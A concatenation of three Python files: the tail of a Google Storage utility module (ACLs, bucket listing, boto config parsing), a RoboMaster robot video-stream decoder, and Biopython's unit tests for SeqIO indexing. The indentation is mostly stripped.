# because the API will fail if we try to set more than one.
matching_entries = [entry for entry in acls.entries.entry_list
if (entry.scope.type == id_type) and
(getattr(entry.scope, field) == id_value)]
if matching_entries:
assert len(matching_entries) == 1, '%d == 1' % len(matching_entries)
acls.entries.entry_list.remove(matching_entries[0])
# Add a new entry to the ACLs.
if permission != self.Permission.EMPTY:
args = {'type': id_type, 'permission': permission}
args[field] = id_value
new_entry = acl.Entry(**args)
acls.entries.entry_list.append(new_entry)
# Finally, write back the modified ACLs.
b.set_acl(acl_or_str=acls, key_name=path)
def list_bucket_contents(self, bucket, subdir=None):
"""Returns files in the Google Storage bucket as a (dirs, files) tuple.
TODO(epoger): This should raise an exception if subdir does not exist in
Google Storage; right now, it just returns empty contents.
Args:
bucket: name of the Google Storage bucket
subdir: directory within the bucket to list, or None for root directory
"""
# The GS command relies on the prefix (if any) ending with a slash.
prefix = subdir or ''
if prefix and not prefix.endswith('/'):
prefix += '/'
prefix_length = len(prefix) if prefix else 0
b = self._connect_to_bucket(bucket=bucket)
items = BucketListResultSet(bucket=b, prefix=prefix, delimiter='/')
dirs = []
files = []
for item in items:
t = type(item)
if t is Key:
files.append(item.name[prefix_length:])
elif t is Prefix:
dirs.append(item.name[prefix_length:-1])
return (dirs, files)
def does_storage_object_exist(self, bucket, object_name):
"""Determines whether an object exists in Google Storage.
Returns True if it exists else returns False.
"""
b = self._connect_to_bucket(bucket=bucket)
if object_name in b:
return True
dirs, files = self.list_bucket_contents(bucket, object_name)
return bool(dirs or files)
@staticmethod
def is_gs_url(url):
"""Returns True if url is a legal Google Storage URL ("gs://bucket/file").
"""
try:
if url.lower().startswith(GS_PREFIX) and len(url) > len(GS_PREFIX):
return url[len(GS_PREFIX)].isalnum()
else:
return False
except AttributeError:
return False
@staticmethod
def split_gs_url(url):
"""Returns (bucket, filepath) corresponding to a legal Google Storage URL.
Raises AttributeError if the input URL is not a legal Google Storage URL.
"""
if not GSUtils.is_gs_url(url):
raise AttributeError('"%s" is not a legal Google Storage URL' % url)
prefix_removed = url[len(GS_PREFIX):]
pathsep_index = prefix_removed.find('/')
if pathsep_index < 0:
return (prefix_removed, '')
else:
return (prefix_removed[:pathsep_index],
prefix_removed[pathsep_index+1:].strip('/'))
def _connect_to_bucket(self, bucket):
"""Returns a Bucket object we can use to access a particular bucket in GS.
Params:
bucket: name of the bucket (e.g., 'chromium-skia-gm'), or a Bucket
object (in which case this param is just returned as-is)
"""
if type(bucket) is Bucket:
return bucket
try:
return self._create_connection().get_bucket(bucket_name=bucket)
except BotoServerError, e:
e.body = repr(e.body) + ' while connecting to bucket=%s' % bucket
raise
def _create_connection(self):
"""Returns a GSConnection object we can use to access Google Storage."""
if self._gs_access_key_id:
return GSConnection(
gs_access_key_id=self._gs_access_key_id,
gs_secret_access_key=self._gs_secret_access_key)
else:
return AnonymousGSConnection()
def _config_file_as_dict(filepath):
"""Reads a boto-style config file into a dict.
Parses all lines from the file of this form: key = value
TODO(epoger): Create unittest.
Params:
filepath: path to config file on local disk
Returns: contents of the config file, as a dictionary
Raises exception if file not found.
"""
dic = {}
  line_regex = re.compile(r'^\s*(\S+)\s*=\s*(\S+)\s*$')
with open(filepath) as f:
for line in f:
match = line_regex.match(line)
if match:
(key, value) = match.groups()
dic[key] = value
return dic
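# Illustrative sketch (addresses the unittest TODO above; not part of the original
# module): _config_file_as_dict() expects plain "key = value" lines, e.g. a .boto
# file containing
#   gs_access_key_id = FAKE_KEY_ID
#   gs_secret_access_key = FAKE_SECRET
# The helper below writes such a file to a temporary path and parses it back.
def _example_parse_boto_config():
  import tempfile
  handle, path = tempfile.mkstemp(suffix='.boto')
  os.close(handle)
  with open(path, 'w') as f:
    f.write('gs_access_key_id = FAKE_KEY_ID\n')
    f.write('gs_secret_access_key = FAKE_SECRET\n')
  try:
    return _config_file_as_dict(filepath=path)
  finally:
    os.remove(path)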
def _makedirs_if_needed(path):
"""Creates a directory (and any parent directories needed), if it does not
exist yet.
Args:
path: full path of directory to create
"""
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _get_local_md5(path):
"""Returns the MD5 hash of a file on local disk."""
hasher = hashlib.md5()
with open(path, 'rb') as f:
while True:
data = f.read(64*1024)
if not data:
return hasher.hexdigest()
hasher.update(data)
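# Hypothetical end-to-end usage (bucket and paths are placeholders): shows the
# typical construction plus a conditional upload and a download, as documented in
# the method docstrings above.
def _example_round_trip():
  gs = GSUtils()  # picks up .boto credentials if found, else anonymous access
  gs.upload_file(source_path='/tmp/report.json',
                 dest_bucket='example-bucket',
                 dest_path='reports/report.json',
                 upload_if=GSUtils.UploadIf.IF_MODIFIED)
  gs.download_file(source_bucket='example-bucket',
                   source_path='reports/report.json',
                   dest_path='/tmp/report_copy.json',
                   create_subdirs_if_needed=True)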
|
robot_video_stream.py
|
"""
RobotVideoStream 中的部分代码 和 libh264decoder 来自 dji-sdk/RoboMaster-SDK
详见 https://github.com/dji-sdk/RoboMaster-SDK/tree/master/sample_code/RoboMasterEP/stream
"""
import queue
import socket
import threading
import time
import cv2
import numpy as np
from PIL import Image as PImage
import libh264decoder
from . import logger, robot_connection
from .decorators import retry
class RobotVideoStream(object):
def __init__(self, robot, display_buffer_size=10):
self.robot = robot
self.log = logger.Logger(self)
self.running = False
self.display_running = False
self.video_decoder = libh264decoder.H264Decoder()
self.display_buffer = queue.Queue(maxsize=display_buffer_size)
self._decoder_thread = threading.Thread(target=self._decoder_thread_task)
self._display_thread = threading.Thread(target=self._display_thread_task)
libh264decoder.disable_logging()
def start(self):
self.robot.basic_ctrl.video_stream_on()
self.robot.connection.start_video_recv()
self._decoder_thread.start()
self.log.info("VideoStream thread started.")
def display(self):
self._display_thread.start()
self.log.info("Display thread started.")
def _decoder_thread_task(self):
self.running = True
package_data = b''
while self.running and threading.main_thread().is_alive():
buff = self.robot.connection.get_video_data()
if buff:
package_data += buff
if len(buff) != 1460:
for frame in self._h264_decode(package_data):
try:
self.display_buffer.put(frame, timeout=2)
except Exception:
self.log.debuginfo('display buffer full.')
package_data = b''
        self.log.debuginfo('Shut down VideoDecoder thread successfully.')
self.running = False
def _h264_decode(self, packet_data):
res_frame_list = []
frames = self.video_decoder.decode(packet_data)
for framedata in frames:
(frame, w, h, ls) = framedata
if frame is not None:
                frame = np.frombuffer(
                    frame, dtype=np.ubyte, count=len(frame))
frame = (frame.reshape((h, int(ls / 3), 3)))
frame = frame[:, :w, :]
res_frame_list.append(frame)
return res_frame_list
def _display_thread_task(self):
self.display_running = True
while self.display_running and threading.main_thread().is_alive():
frame = self.get_frame(timeout=2)
if frame is not None:
image = PImage.fromarray(frame)
img = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
cv2.imshow("Liveview", img)
cv2.waitKey(1)
        self.log.debuginfo('Shut down Display thread successfully.')
self.display_running = False
    def get_last_frame(self):
        try:
            # queue.Queue keeps its items in an internal deque; peek at the newest frame.
            return self.display_buffer.queue[-1]
        except IndexError:
            self.log.debuginfo("Fail to get last frame: display buffer empty.")
            return None
def get_frame(self, timeout=2):
try:
            return self.display_buffer.get(timeout=timeout)
except Exception:
self.log.debuginfo("Fail to get frame: display buffer empty.")
@property
def last_frame(self):
return self.get_last_frame()
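# Illustrative usage sketch (not part of the original module): the `robot` argument
# is assumed to come from this package's robot class and to expose the `basic_ctrl`
# and `connection` helpers used by start() above.
def example_liveview(robot):
    stream = RobotVideoStream(robot, display_buffer_size=10)
    stream.start()    # turn the video stream on and begin decoding frames
    stream.display()  # open an OpenCV "Liveview" window fed from the display buffer
    return stream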
|
test_SeqIO_index.py
|
# Copyright 2009-2017 by Peter Cock. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Unit tests for Bio.SeqIO.index(...) and index_db() functions."""
try:
import sqlite3
except ImportError:
# Try to run what tests we can in case sqlite3 was not installed
sqlite3 = None
import os
import unittest
import tempfile
import threading
import gzip
import warnings
from io import BytesIO
from io import StringIO
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
from Bio.SeqIO._index import _FormatToRandomAccess
from Bio import BiopythonParserWarning
from Bio import MissingPythonDependencyError
from seq_tests_common import SeqRecordTestBaseClass
from test_SeqIO import SeqIOTestBaseClass
CUR_DIR = os.getcwd()
if sqlite3:
def raw_filenames(index_filename):
"""Open SQLite index and extract filenames (as is).
Returns a 2-tuple, holding a list of strings, and the value
of the meta_data.filenames_relative_to_index (or None).
"""
con = sqlite3.dbapi2.connect(index_filename)
filenames = [
row[0]
for row in con.execute(
"SELECT name FROM file_data ORDER BY file_number;"
).fetchall()
]
try:
(filenames_relative_to_index,) = con.execute(
"SELECT value FROM meta_data WHERE key=?;",
("filenames_relative_to_index",),
).fetchone()
filenames_relative_to_index = filenames_relative_to_index.upper() == "TRUE"
except TypeError:
filenames_relative_to_index = None
con.close()
return filenames, filenames_relative_to_index
class OldIndexTest(unittest.TestCase):
"""Testing a pre-built index (make sure cross platform etc).
>>> from Bio import SeqIO
>>> d = SeqIO.index_db("triple_sff.idx", ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"], "sff")
>>> len(d)
54
"""
def setUp(self):
os.chdir(CUR_DIR)
def tearDown(self):
os.chdir(CUR_DIR)
def test_old(self):
"""Load existing index with no options (from parent directory)."""
d = SeqIO.index_db("Roche/triple_sff.idx")
self.assertEqual(54, len(d))
self.assertRaises(FileNotFoundError, d.get_raw, "alpha")
def test_old_check_same_thread(self):
"""Setting check_same_thread to False doesn't raise an exception."""
d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")
def reader_thread():
try:
d["alpha"]
except sqlite3.ProgrammingError:
self.fail(
"Raised sqlite3.ProgrammingError in violation of check_same_thread=False"
)
reader = threading.Thread(target=reader_thread)
reader.start()
reader.join()
def test_old_rel(self):
"""Load existing index (with relative paths) with no options (from parent directory)."""
d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_contents(self):
"""Check actual filenames in existing indexes."""
filenames, flag = raw_filenames("Roche/triple_sff.idx")
self.assertIsNone(flag)
self.assertEqual(
filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
)
filenames, flag = raw_filenames("Roche/triple_sff_rel_paths.idx")
self.assertTrue(flag)
self.assertEqual(
filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
)
def test_old_same_dir(self):
"""Load existing index with no options (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db("triple_sff.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_same_dir_rel(self):
"""Load existing index (with relative paths) with no options (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db("triple_sff_rel_paths.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_format(self):
"""Load existing index with correct format."""
d = SeqIO.index_db("Roche/triple_sff.idx", format="sff")
self.assertEqual(54, len(d))
def test_old_format_wrong(self):
"""Load existing index with wrong format."""
self.assertRaises(
ValueError, SeqIO.index_db, "Roche/triple_sff.idx", format="fasta"
)
def test_old_files(self):
"""Load existing index with correct files (from parent directory)."""
d = SeqIO.index_db(
"Roche/triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
)
self.assertEqual(54, len(d))
self.assertRaises(FileNotFoundError, d.get_raw, "alpha")
def test_old_files_same_dir(self):
"""Load existing index with correct files (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db(
"triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
)
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_files_wrong(self):
"""Load existing index with wrong files."""
self.assertRaises(
ValueError,
SeqIO.index_db,
"Roche/triple_sff.idx",
["a.sff", "b.sff", "c.sff"],
)
def test_old_files_wrong2(self):
"""Load existing index with wrong number of files."""
self.assertRaises(
ValueError,
SeqIO.index_db,
"Roche/triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff"],
)
class NewIndexTest(unittest.TestCase):
"""Check paths etc in newly built index."""
def setUp(self):
os.chdir(CUR_DIR)
def tearDown(self):
os.chdir(CUR_DIR)
for i in ["temp.idx", "Roche/temp.idx"]:
if os.path.isfile(i):
os.remove(i)
def check(self, index_file, sff_files, expt_sff_files):
if os.path.isfile(index_file):
os.remove(index_file)
# Build index...
d = SeqIO.index_db(index_file, sff_files, "sff")
self.assertEqual(395, len(d["alpha"]))
d._con.close() # hack for PyPy
d.close()
self.assertEqual(
[os.path.abspath(f) for f in sff_files],
[os.path.abspath(f) for f in d._filenames],
)
# Now directly check the filenames inside the SQLite index:
filenames, flag = raw_filenames(index_file)
self.assertTrue(flag)
self.assertEqual(filenames, expt_sff_files)
# Load index...
d = SeqIO.index_db(index_file, sff_files)
self.assertEqual(395, len(d["alpha"]))
d._con.close() # hack for PyPy
d.close()
self.assertEqual([os.path.abspath(f) for f in sff_files], d._filenames)
os.remove(index_file)
def test_child_folder_rel(self):
"""Check relative links to child folder."""
        # Note we expect relative paths recorded with Unix slashes!
expt_sff_files = [
"Roche/E3MFGYR02_no_manifest.sff",
"Roche/greek.sff",
"Roche/paired.sff",
]
self.check("temp.idx", expt_sff_files, expt_sff_files)
# Here index is given as abs
self.check(
os.path.abspath("temp.idx"),
[
"Roche/E3MFGYR02_no_manifest.sff",
os.path.abspath("Roche/greek.sff"),
"Roche/paired.sff",
],
expt_sff_files,
)
# Here index is given as relative path
self.check(
"temp.idx",
[
"Roche/E3MFGYR02_no_manifest.sff",
os.path.abspath("Roche/greek.sff"),
"Roche/paired.sff",
],
expt_sff_files,
)
def test_same_folder(self):
"""Check relative links in same folder."""
os.chdir("Roche")
expt_sff_files = ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
# Here everything is relative,
self.check("temp.idx", expt_sff_files, expt_sff_files)
self.check(
os.path.abspath("temp.idx"),
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
self.check(
"temp.idx",
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
self.check(
"../Roche/temp.idx",
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
def test_some_abs(self):
"""Check absolute filenames in index.
Unless the repository and tests themselves are under the temp
directory (as detected by ``tempfile``), we expect the index to
use absolute filenames.
"""
h, t = tempfile.mkstemp(prefix="index_test_", suffix=".idx")
os.close(h)
os.remove(t)
abs_sff_files = [
os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
os.path.abspath("Roche/greek.sff"),
os.path.abspath(os.path.join("Roche", "paired.sff")),
]
if os.getcwd().startswith(os.path.dirname(t)):
# The tests are being run from within the temp directory,
# e.g. index filename /tmp/index_test_XYZ.idx
# and working directory of /tmp/biopython/Tests/
# This means the indexing will use a RELATIVE path
# e.g. biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
# not /tmp/biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
expt_sff_files = [
os.path.relpath(f, os.path.dirname(t)) for f in abs_sff_files
]
else:
expt_sff_files = abs_sff_files
# Providing absolute paths...
self.check(t, abs_sff_files, expt_sff_files)
# Now try with mix of abs and relative paths...
self.check(
t,
[
os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
os.path.join("Roche", "greek.sff"),
os.path.abspath("Roche/paired.sff"),
],
expt_sff_files,
)
class IndexDictTests(SeqRecordTestBaseClass, SeqIOTestBaseClass):
tests = [
("Ace/contig1.ace", "ace"),
("Ace/consed_sample.ace", "ace"),
("Ace/seq.cap.ace", "ace"),
("Quality/wrapping_original_sanger.fastq", "fastq"),
("Quality/example.fastq", "fastq"), # Unix newlines
("Quality/example.fastq", "fastq-sanger"),
("Quality/example_dos.fastq", "fastq"), # DOS/Windows newlines
("Quality/tricky.fastq", "fastq"),
("Quality/sanger_faked.fastq", "fastq-sanger"),
("Quality/solexa_faked.fastq", "fastq-solexa"),
("Quality/illumina_faked.fastq", "fastq-illumina"),
("Quality/zero_length.fastq", "fastq"),
("EMBL/epo_prt_selection.embl", "embl"),
("EMBL/U87107.embl", "embl"),
("EMBL/TRBG361.embl", "embl"),
("EMBL/kipo_prt_sample.embl", "embl"),
("EMBL/A04195.imgt", "embl"), # Not a proper EMBL file, an IMGT file
("EMBL/A04195.imgt", "imgt"),
("EMBL/hla_3260_sample.imgt", "imgt"),
("EMBL/patents.embl", "embl"),
("EMBL/AAA03323.embl", "embl"),
("GenBank/NC_000932.faa", "fasta"),
("GenBank/NC_005816.faa", "fasta"),
("GenBank/NC_005816.tsv", "tab"),
("GenBank/NC_005816.ffn", "fasta"),
("GenBank/NC_005816.fna", "fasta"),
("GenBank/NC_005816.gb", "gb"),
("GenBank/cor6_6.gb", "genbank"),
("GenBank/empty_accession.gbk", "gb"),
("GenBank/empty_version.gbk", "gb"),
("IntelliGenetics/vpu_nucaligned.txt", "ig"),
("IntelliGenetics/TAT_mase_nuc.txt", "ig"),
("IntelliGenetics/VIF_mase-pro.txt", "ig"),
("Phd/phd1", "phd"),
("Phd/phd2", "phd"),
("Phd/phd_solexa", "phd"),
("Phd/phd_454", "phd"),
("NBRF/B_nuc.pir", "pir"),
("NBRF/Cw_prot.pir", "pir"),
("NBRF/clustalw.pir", "pir"),
("SwissProt/sp001", "swiss"),
("SwissProt/sp010", "swiss"),
("SwissProt/sp016", "swiss"),
("SwissProt/multi_ex.txt", "swiss"),
("SwissProt/multi_ex.xml", "uniprot-xml"),
("SwissProt/multi_ex.fasta", "fasta"),
("Roche/E3MFGYR02_random_10_reads.sff", "sff"),
("Roche/E3MFGYR02_random_10_reads.sff", "sff-trim"),
("Roche/E3MFGYR02_index_at_start.sff", "sff"),
("Roche/E3MFGYR02_index_in_middle.sff", "sff"),
("Roche/E3MFGYR02_alt_index_at_start.sff", "sff"),
("Roche/E3MFGYR02_alt_index_in_middle.sff", "sff"),
("Roche/E3MFGYR02_alt_index_at_end.sff", "sff"),
("Roche/E3MFGYR02_no_manifest.sff", "sff"),
("Roche/greek.sff", "sff"),
("Roche/greek.sff", "sff-trim"),
("Roche/paired.sff", "sff"),
("Roche/paired.sff", "sff-trim"),
]
def setUp(self):
os.chdir(CUR_DIR)
h, self.index_tmp = tempfile.mkstemp("_idx.tmp")
os.close(h)
def tearDown(self):
os.chdir(CUR_DIR)
if os.path.isfile(self.index_tmp):
os.remove(self.index_tmp)
def check_dict_methods(self, rec_dict, keys, ids, msg):
self.assertCountEqual(keys, rec_dict.keys(), msg=msg)
# This is redundant, I just want to make sure len works:
self.assertEqual(len(keys), len(rec_dict), msg=msg)
# Make sure boolean evaluation works
self.assertEqual(bool(keys), bool(rec_dict), msg=msg)
for key, id in zip(keys, ids):
self.assertIn(key, rec_dict, msg=msg)
self.assertEqual(id, rec_dict[key].id, msg=msg)
self.assertEqual(id, rec_dict.get(key).id, msg=msg)
        # Check non-existent keys,
assert chr(0) not in keys, "Bad example in test"
with self.assertRaises(KeyError, msg=msg):
rec = rec_dict[chr(0)]
self.assertIsNone(rec_dict.get(chr(0)), msg=msg)
self.assertEqual(rec_dict.get(chr(0), chr(1)), chr(1), msg=msg)
with self.assertRaises(AttributeError, msg=msg):
rec_dict.iteritems
for key, rec in rec_dict.items():
self.assertIn(key, keys, msg=msg)
self.assertIsInstance(rec, SeqRecord, msg=msg)
self.assertIn(rec.id, ids, msg=msg)
for rec in rec_dict.values():
self.assertIn(key, keys, msg=msg)
self.assertIsInstance(rec, SeqRecord, msg=msg)
self.assertIn(rec.id, ids, msg=msg)
def simple_check(self, filename, fmt, comp):
"""Check indexing (without a key function)."""
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
else:
id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]
with warnings.catch_warnings():
if "_alt_index_" in filename:
# BiopythonParserWarning: Could not parse the SFF index:
# Unknown magic number b'.diy' in SFF index header:
# b'.diy1.00'
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
if not sqlite3:
return
# In memory,
# note here give filenames as list of strings
rec_dict = SeqIO.index_db(":memory:", [filename], fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
# check error conditions
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", format="dummy")
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", filenames=["dummy"])
# Saving to file...
index_tmp = self.index_tmp
if os.path.isfile(index_tmp):
os.remove(index_tmp)
# To disk,
# note here we give the filename as a single string
# to confirm that works too.
rec_dict = SeqIO.index_db(index_tmp, filename, fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload it...
rec_dict = SeqIO.index_db(index_tmp, [filename], fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload without passing filenames and format
# and switch directory to check paths still work
index_tmp = os.path.abspath(index_tmp)
os.chdir(os.path.dirname(filename))
try:
rec_dict = SeqIO.index_db(index_tmp)
finally:
os.chdir(CUR_DIR)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
os.remove(index_tmp)
def add_prefix(self, key):
"""Sample key_function for testing index code."""
return "id_" + key
def key_check(self, filename, fmt, comp):
"""Check indexing with a key function."""
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
else:
id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]
key_list = [self.add_prefix(id) for id in id_list]
with warnings.catch_warnings():
if "_alt_index_" in filename:
# BiopythonParserWarning: Could not parse the SFF index:
# Unknown magic number b'.diy' in SFF index header:
# b'.diy1.00'
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt, key_function=self.add_prefix)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
if not sqlite3:
return
# In memory,
rec_dict = SeqIO.index_db(
":memory:", [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
# check error conditions
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", format="dummy", key_function=self.add_prefix)
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(
":memory:", filenames=["dummy"], key_function=self.add_prefix
)
rec_dict.close()
# Saving to file...
index_tmp = filename + ".key.idx"
if os.path.isfile(index_tmp):
os.remove(index_tmp)
rec_dict = SeqIO.index_db(
index_tmp, [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload it...
rec_dict = SeqIO.index_db(
index_tmp, [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload without passing filenames and format
rec_dict = SeqIO.index_db(index_tmp, key_function=self.add_prefix)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
os.remove(index_tmp)
# Done
def get_raw_check(self, filename, fmt, comp):
# Also checking the key_function here
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
with gzip.open(filename, "rb") as handle:
raw_file = handle.read()
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id.lower() for rec in SeqIO.parse(handle, fmt)]
else:
with open(filename, "rb") as handle:
raw_file = handle.read()
id_list = [rec.id.lower() for rec in SeqIO.parse(filename, fmt)]
if fmt in ["sff"]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
if sqlite3:
rec_dict_db = SeqIO.index_db(
":memory:", filename, fmt, key_function=str.lower,
)
else:
rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
if sqlite3:
rec_dict_db = SeqIO.index_db(
":memory:", filename, fmt, key_function=str.lower,
)
self.assertCountEqual(id_list, rec_dict.keys(), msg=msg)
if sqlite3:
self.assertCountEqual(id_list, rec_dict_db.keys(), msg=msg)
for key in id_list:
self.assertIn(key, rec_dict, msg=msg)
self.assertEqual(key, rec_dict[key].id.lower(), msg=msg)
self.assertEqual(key, rec_dict.get(key).id.lower(), msg=msg)
raw = rec_dict.get_raw(key)
self.assertIsInstance(raw, bytes, msg=msg)
self.assertTrue(raw.strip(), msg=msg)
self.assertIn(raw, raw_file, msg=msg)
if sqlite3:
raw_db = rec_dict_db.get_raw(key)
                # rec_dict.get_raw uses the format-specific get_raw, which re-scans the file;
                # rec_dict_db.get_raw uses the raw record length recorded when indexing.
self.assertEqual(raw, raw_db, msg=msg)
rec1 = rec_dict[key]
# Following isn't very elegant, but it lets me test the
# __getitem__ SFF code is working.
mode = self.get_mode(fmt)
if mode == "b":
handle = BytesIO(raw)
elif mode == "t":
handle = StringIO(raw.decode())
else:
raise RuntimeError("Unexpected mode %s" % mode)
if fmt == "sff":
rec2 = SeqIO.SffIO._sff_read_seq_record(
handle,
rec_dict._proxy._flows_per_read,
rec_dict._proxy._flow_chars,
rec_dict._proxy._key_sequence,
trim=False,
)
elif fmt == "sff-trim":
rec2 = SeqIO.SffIO._sff_read_seq_record(
handle,
rec_dict._proxy._flows_per_read,
rec_dict._proxy._flow_chars,
rec_dict._proxy._key_sequence,
trim=True,
)
elif fmt == "uniprot-xml":
self.assertTrue(raw.startswith(b"<entry "), msg=msg)
self.assertTrue(raw.endswith(b"</entry>"), msg=msg)
# Currently the __getitem__ method uses this
# trick too, but we hope to fix that later
raw = (
"""<?xml version='1.0' encoding='UTF-8'?>
<uniprot xmlns="http://uniprot.org/uniprot"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://uniprot.org/uniprot
http://www.uniprot.org/support/docs/uniprot.xsd">
%s
</uniprot>
"""
% raw.decode()
)
handle = StringIO(raw)
rec2 = SeqIO.read(handle, fmt)
else:
rec2 = SeqIO.read(handle, fmt)
self.compare_record(rec1, rec2)
rec_dict.close()
del rec_dict
if sqlite3:
def test_alpha_fails_db(self):
"""Reject alphabet argument in Bio.SeqIO.index_db()."""
# In historic usage, alphabet=... would be a Bio.Alphabet object.
self.assertRaises(
ValueError,
SeqIO.index_db,
":memory:",
["Fasta/dups.fasta"],
"fasta",
alphabet="XXX",
)
def test_alpha_fails(self):
"""Reject alphabet argument in Bio.SeqIO.index()."""
# In historic usage, alphabet=... would be a Bio.Alphabet object.
self.assertRaises(
ValueError, SeqIO.index, "Fasta/dups.fasta", "fasta", alphabet="XXX"
)
if sqlite3:
def test_duplicates_index_db(self):
"""Index file with duplicate identifiers with Bio.SeqIO.index_db()."""
self.assertRaises(
ValueError, SeqIO.index_db, ":memory:", ["Fasta/dups.fasta"], "fasta"
)
def test_duplicates_index(self):
"""Index file with duplicate identifiers with Bio.SeqIO.index()."""
self.assertRaises(ValueError, SeqIO.index, "Fasta/dups.fasta", "fasta")
def test_duplicates_to_dict(self):
"""Index file with duplicate identifiers with Bio.SeqIO.to_dict()."""
with open("Fasta/dups.fasta") as handle:
iterator = SeqIO.parse(handle, "fasta")
self.assertRaises(ValueError, SeqIO.to_dict, iterator)
def test_simple_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.simple_check(filename2, fmt, comp)
def test_key_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.key_check(filename2, fmt, comp)
def test_raw_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.get_raw_check(filename2, fmt, comp)
class IndexOrderingSingleFile(unittest.TestCase):
f = "GenBank/NC_000932.faa"
ids = [r.id for r in SeqIO.parse(f, "fasta")]
def test_order_to_dict(self):
"""Check to_dict preserves order in indexed file."""
d = SeqIO.to_dict(SeqIO.parse(self.f, "fasta"))
self.assertEqual(self.ids, list(d))
def test_order_index(self):
"""Check index preserves order in indexed file."""
d = SeqIO.index(self.f, "fasta")
self.assertEqual(self.ids, list(d))
if sqlite3:
def test_order_index_db(self):
"""Check index_db preserves ordering indexed file."""
d = SeqIO.index_db(":memory:", [self.f], "fasta")
self.assertEqual(self.ids, list(d))
if sqlite3:
class IndexOrderingManyFiles(unittest.TestCase):
def test_order_index_db(self):
"""Check index_db preserves order in multiple indexed files."""
files = ["GenBank/NC_000932.faa", "GenBank/NC_005816.faa"]
ids = []
for f in files:
ids.extend(r.id for r in SeqIO.parse(f, "fasta"))
d = SeqIO.index_db(":memory:", files, "fasta")
self.assertEqual(ids, list(d))
